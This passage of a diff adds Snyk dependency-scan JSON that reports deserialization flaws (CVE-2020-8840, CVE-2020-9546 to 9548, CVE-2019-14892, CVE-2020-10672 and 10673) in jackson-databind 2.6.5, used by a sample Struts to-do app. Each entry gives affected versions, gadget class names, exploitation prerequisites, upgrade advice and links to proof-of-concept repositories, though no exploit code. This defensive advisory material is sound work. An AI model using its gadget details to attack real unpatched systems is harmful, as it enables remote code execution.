"CVE-2020-8840" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-02-11T07:57:04.144993Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-02-09T21:12:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + 
"packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-02-11T21:12:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:13.031834Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2634", + "title": "Github Issue #1" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2631", + "title": "GitHub Issue #2" + }, + { + "url": 
"https://github.com/fairyming/CVE-2020-9548", + "title": "GitHub PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.016713Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", + "epssDetails": { + "percentile": "0.79604", + "probability": "0.00652", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5p34-5m6p-p58g", + "GHSA-p43x-xfjf-5jhr", + "GHSA-q93h-jc49-78gg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-02T10:29:31.222015Z", + "functions_new": [ + 
{ + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T05:18:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T05:18:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.132894Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Pedro Sampaio" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.3", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + 
"malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2462", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2469", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", + "title": "RedHat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.772859Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data 
Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", + "epssDetails": { + "percentile": "0.73523", + "probability": "0.00392", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14892", + "CVE-2019-14893" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + 
"GHSA-cf6r-3wgc-h863", + "GHSA-qmqc-x3r4-6v39" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-03T08:13:33.357434Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T17:09:34Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T17:09:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.500842Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": 
"com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2660", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVE's Blog" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-10673", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.907430Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10673" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + 
"GHSA-fqwf-pjwf-7vqv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T14:36:02.644920Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:21Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.167932Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": 
"ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2659", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVEs: Don’t Panic" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:35.299190Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson 
Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10672" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-95cm-88f5-f2c7" + ] + }, + "packageName": 
